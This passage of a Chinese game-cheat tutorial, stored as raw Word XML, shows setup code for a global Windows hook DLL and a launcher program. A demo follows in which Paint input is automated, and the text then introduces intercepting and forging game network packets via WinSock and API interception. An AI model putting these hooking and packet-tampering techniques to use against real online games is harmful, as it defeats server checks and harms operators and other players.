        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数则删除下面这行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>UNREFERENCED_PARAMETER(lpReserved);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if (dwReason == DLL_PROCESS_ATTACH)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TRACE0("NOtePadHOOK.DLL Initializing&amp;#33;\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅初始化一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if (&amp;#33;AfxInitExtensionModule(ActiveKeyDLL, hInstance))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>new CDynLinkLibrary(ActiveKeyDLL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加入动态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MFC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类库中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>glhInstance = hInstance;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入保存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例句柄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>else if (dwReason == DLL_PROCESS_DETACH)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TRACE0("NotePadHOOK.DLL Terminating&amp;#33;\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终止这个链接库前调用它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AfxTermExtensionModule(ActiveKeyDLL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">return 1; </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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(8).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　接着，我们还需要创建一个外壳程序将全局钩子安装了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中，这个外壳程序编写步骤如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个对话框模式的应用程序，项目名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Simulate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在主对话框中加入一个按钮，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ClassWizard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为其创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CLICK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拷贝到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Simulate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目目录下。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(4).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从“工程”菜单中选择“设置”，弹出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Project Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对话框，选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签，在“对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库模块”中输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(5).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头文件加入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Simulate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目中，并在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stdafx.h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中加入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#include ActiveKey.h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(6).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在按钮单击事件函数输入如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">void CSimulateDlg::OnButton1() </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>// TODO: Add your control notification handler code here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if( &amp;#33;bSetup )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m_hook.Start();//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>激活全局钩子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m_hook.Stop();//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>撤消全局钩子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>bSetup = &amp;#33;bSetup;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(7).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译项目，并运行程序，单击按钮激活外挂。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(8).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动画笔程序，选择文本工具并将笔的颜色设置为红色，将鼠标放在任意位置后，按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键，画笔程序自动移动鼠标并写下一个红色的大写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。图一展示了按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键前的画笔程序的状态，图二展示了按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键后的画笔程序的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图一：按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(001.jpg)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图二：按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(002.jpg)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　五、封包技术</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　通过对动作模拟技术的介绍，我们对游戏外挂有了一定程度上的认识，也学会了使用动作模拟技术来实现简单的动作模拟型游戏外挂的制作。这种动作模拟型游戏外挂有一定的局限性，它仅仅只能解决使用计算机代替人力完成那么有规律、繁琐而无聊的游戏动作。但是，随着网络游戏的盛行和复杂度的增加，很多游戏要求将客户端动作信息及时反馈回服务器，通过服务器对这些动作信息进行有效认证后，再向客户端发送下一步游戏动作信息，这样动作模拟技术将失去原有的效应。为了更好地“外挂”这些游戏，游戏外挂程序也进行了升级换代，它们将以前针对游戏用户界面层的模拟推进到数据通讯层，通过封包技术在客户端挡截游戏服务器发送来的游戏控制数据包，分析数据包并修改数据包；同时还需按照游戏数据包结构创建数据包，再模拟客户端发送给游戏服务器，这个过程其实就是一个封包的过程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　封包的技术是实现第二类游戏外挂的最核心的技术。封包技术涉及的知识很广泛，实现方法也很多，如挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>挡截消息、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VxD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>驱动程序等。在此我们也不可能在此文中将所有的封包技术都进行详细介绍，故选择两种在游戏外挂程序中最常用的两种方法：挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
